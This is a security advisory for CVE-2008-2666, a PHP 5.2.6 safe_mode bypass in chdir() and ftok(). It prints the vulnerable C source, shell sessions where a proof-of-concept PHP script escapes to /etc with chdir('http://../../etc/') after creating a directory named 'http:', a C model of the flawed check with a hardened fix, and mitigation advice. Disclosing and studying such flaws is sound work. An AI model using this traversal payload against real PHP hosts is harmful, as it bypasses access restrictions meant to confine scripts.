Bug: PHP 5.2.6 chdir(),ftok() (standard ext) safe_mode bypass


PHP 5.2.6 chdir(),ftok() (standard ext) safe_mode bypass

Published: 2008.06.17
Credit: Maksymilian Arciemowicz
Risk: Medium
CWE: CWE-264
CVE: CVE-2008-2666
Local: Yes
Remote: No

CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: Not required
Confidentiality impact: Partial
Integrity impact: None
Availability impact: None

[PHP 5.2.6 chdir(),ftok() (standard ext) safe_mode bypass ]

Author: Maksymilian Arciemowicz
Date:
- Written: 10.05.2008
- Public: 17.06.2008

CVE: CVE-2008-2666
CWE: CWE-264
Risk: Medium

Affected Software: PHP 5.2.6
Vendor: http://www.php.net

--- 0. Description ---

PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with a couple of unique
PHP-specific features thrown in. The goal of the language is to allow web developers to write dynamically generated
pages quickly.

chdir - Change directory

SYNOPSIS:

bool chdir ( string $directory )

http://pl.php.net/manual/en/function.chdir.php


ftok - Convert a pathname and a project identifier to a System V IPC key

SYNOPSIS:

int ftok ( string $pathname , string $proj )

http://pl.php.net/manual/en/function.ftok.php

!!! WARNING !!!
IT IS POSSIBLE TO EXPLOIT MORE FUNCTIONS WITH http: PREFIX. WE WILL NOT LIST ALL VULNERABLE FUNCTIONS

--- 1. chdir(), ftok() (from standard ext) and more safe_mode bypass ---
Let's look at the chdir() function:

---
PHP_FUNCTION(chdir)
{
	char *str;
	int ret, str_len;

	if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "s", &str, &str_len) == FAILURE) {
		RETURN_FALSE;
	}

	/* the only guard: safe_mode uid check, then open_basedir */
	if ((PG(safe_mode) && !php_checkuid(str, NULL, CHECKUID_CHECK_FILE_AND_DIR)) || php_check_open_basedir(str TSRMLS_CC)) {
		RETURN_FALSE;
	}
	/* the string that passed the guard is handed to the OS unchanged */
	ret = VCWD_CHDIR(str);

	if (ret != 0) {
		php_error_docref(NULL TSRMLS_CC, E_WARNING, "%s (errno %d)", strerror(errno), errno);
		RETURN_FALSE;
	}

	RETURN_TRUE;
}
---

str is checked by safe_mode. Example:

---
Warning: chdir(): SAFE MODE Restriction in effect. The script whose uid is 80 is not allowed to access / owned by uid 0 in /www/mb/mb.php on line 8
---

Now create a subdirectory literally named "http:" in the current directory. Then

chdir("http://../../../../../../")

succeeds and we end up in /.

Why?

For str = "http://../../../../../../" the guard

((PG(safe_mode) && !php_checkuid(str, NULL, CHECKUID_CHECK_FILE_AND_DIR)) || php_check_open_basedir(str TSRMLS_CC))

evaluates to false, so VCWD_CHDIR(str) is reached: safe_mode treats any path beginning with http:// as a URL and skips the owner comparison (and in this setup the open_basedir check passes as well). The operating system never sees a URL, though. chdir(2) resolves "http://../../../../../../" as an ordinary relative path: the attacker-created directory "http:", then plain ".." traversal. The check and the use interpret the same string differently, and the check is the one that is wrong.

The same applies to ftok() (and to other functions whose path argument goes through this check).

---EXAMPLE1---
cxib# cat /www/wufff.php
<?
echo getcwd()."\n";
chdir("/etc/");
echo getcwd()."\n";
?>
cxib# ls -la /www/wufff.php
-rw-r--r-- 1 www www 62 Jun 17 17:14 /www/wufff.php
cxib# php /www/wufff.php
/www

Warning: chdir(): SAFE MODE Restriction in effect. The script whose uid is 80 is not allowed to access /etc/ owned by uid 0 in /www/wufff.php on line 3
/www
cxib#
---/EXAMPLE1---

---EXAMPLE2---
cxib# ls -la /www/wufff.php
-rw-r--r-- 1 www www 74 Jun 17 17:13 /www/wufff.php
cxib# ls -la /www/http:
total 8
drwxr-xr-x 2 www www 512 Jun 17 17:12 .
drwxr-xr-x 19 www www 4608 Jun 17 17:13 ..
cxib# cat /www/wufff.php
<?
echo getcwd()."\n";
chdir("http://../../etc/");
echo getcwd()."\n";
?>
cxib# php /www/wufff.php
/www
/etc
cxib#
---/EXAMPLE2---
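The two sessions above can be reproduced without a PHP 5.2.6 build. The following C program is an added example, not code from the advisory or from PHP: vulnerable_check() is a model of the safe_mode owner check written from the advisory's description ("safe_mode will ignore all paths with http://"), not a copy of php_checkuid(), and hardened_check() is the obvious fix of canonicalising the string with realpath() before comparing owners, so that the check sees the same target chdir(2) will use. The scenario assumes a writable /tmp, that /etc is owned by root, and uses uid 80 from the advisory as the script owner; the directory name "http:" and the traversal string are taken from EXAMPLE2.

```c
#define _DEFAULT_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <limits.h>
#include <sys/stat.h>

/*
 * Model of the check described in the advisory (an assumption, not PHP's
 * code): a string that looks like a URL is waved through, a plain path is
 * allowed only when the script's uid owns the target.
 */
static int vulnerable_check(const char *path, uid_t script_uid)
{
    struct stat st;

    if (strstr(path, "://") != NULL)
        return 1;                       /* "URL": owner check skipped */
    if (stat(path, &st) != 0)
        return 0;
    return st.st_uid == script_uid;
}

/*
 * Hardened variant: decide on the path exactly as chdir(2) will interpret
 * it. realpath() turns "http://../../etc/" into "/etc" because "http:" is
 * just a directory name to the kernel, so the owner comparison hits the
 * real target. Paths that do not exist are refused.
 */
static int hardened_check(const char *path, uid_t script_uid)
{
    char resolved[PATH_MAX];
    struct stat st;

    if (realpath(path, resolved) == NULL)
        return 0;
    if (stat(resolved, &st) != 0)
        return 0;
    return st.st_uid == script_uid;
}

typedef int (*check_fn)(const char *path, uid_t script_uid);

/* chdir() guarded by a check; on success the new cwd is copied to `where`. */
static int guarded_chdir(check_fn check, const char *path, uid_t script_uid,
                         char *where, size_t where_len)
{
    if (!check(path, script_uid))
        return 0;
    if (chdir(path) != 0)
        return 0;
    return getcwd(where, where_len) != NULL;
}

/*
 * Reproduces EXAMPLE1 and EXAMPLE2 in one run: a scratch directory with a
 * subdirectory literally named "http:" is created, then "/etc/" and the
 * traversal string are pushed through the checks. script_uid plays the
 * script owner (uid 80 in the advisory); /etc belongs to root, so a correct
 * check must refuse it. Returns 0 on setup failure, 1 otherwise.
 */
static int run_scenario(uid_t script_uid, int *direct_ok, int *vuln_ok,
                        int *hard_ok, int *legit_ok, char *vuln_cwd, size_t n)
{
    char scratch[] = "/tmp/safemode.XXXXXX";
    char sub[PATH_MAX], start[PATH_MAX];
    /* Enough "../" to reach "/" from any realistic depth, then into /etc. */
    const char *traversal =
        "http://../../../../../../../../../../../../../../../../etc/";

    if (getcwd(start, sizeof start) == NULL || mkdtemp(scratch) == NULL)
        return 0;
    snprintf(sub, sizeof sub, "%s/http:", scratch);
    if (chdir(scratch) != 0 || mkdir("http:", 0755) != 0)
        return 0;

    *direct_ok = vulnerable_check("/etc/", script_uid);      /* EXAMPLE1 */
    *legit_ok  = hardened_check("http:", getuid());          /* our own dir */
    *hard_ok   = guarded_chdir(hardened_check, traversal, script_uid, vuln_cwd, n);
    *vuln_ok   = guarded_chdir(vulnerable_check, traversal, script_uid, vuln_cwd, n);

    (void)chdir(start);
    (void)rmdir(sub);
    (void)rmdir(scratch);
    return 1;
}

int main(void)
{
    int direct, vuln, hard, legit;
    char where[PATH_MAX] = "";

    if (!run_scenario(80, &direct, &vuln, &hard, &legit, where, sizeof where))
        return 1;
    printf("chdir(\"/etc/\") allowed by modelled safe_mode check: %d\n", direct);
    printf("traversal allowed by vulnerable check: %d (cwd now %s)\n", vuln, where);
    printf("traversal allowed by hardened check:   %d\n", hard);
    printf("own \"http:\" dir allowed by hardened check: %d\n", legit);
    return 0;
}
```

The point to take from the run is that the hardened check refuses the traversal and still admits the script's own "http:" directory: the fix is not to blacklist the string "http:" but to evaluate the same canonical path the operating system will act on.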

!!! WARNING !!!
IT IS POSSIBLE TO EXPLOIT MORE FUNCTIONS WITH THE http: PREFIX. WE WILL NOT LIST ALL VULNERABLE FUNCTIONS.

--- 2. How to fix ---
Do not rely on safe_mode as your main security control. safe_mode was deprecated in PHP 5.3.0 and removed in PHP 5.4.0; separate users at the operating-system level (distinct uids per site) and treat open_basedir as a secondary control, not as a substitute.

--- 3. Contact ---
Author: Maksymilian Arciemowicz


References:

http://www.us-cert.gov/cas/techalerts/TA09-133A.html
http://xforce.iss.net/xforce/xfdb/43198
http://www.vupen.com/english/advisories/2009/1297
http://www.securitytracker.com/id?1020328
http://www.securityfocus.com/bid/29796
http://www.securityfocus.com/archive/1/archive/1/501376/100/0/threaded
http://wiki.rpath.com/Advisories:rPSA-2009-0035
http://support.apple.com/kb/HT3549
http://securityreason.com/securityalert/3942
http://securityreason.com/achievement_securityalert/55
http://secunia.com/advisories/35650
http://secunia.com/advisories/35074
http://marc.info/?l=bugtraq&m=125631037611762&w=2
http://marc.info/?l=bugtraq&m=124654546101607&w=2
http://lists.apple.com/archives/security-announce/2009/May/msg00002.html

Copyright 2014, cxsecurity.com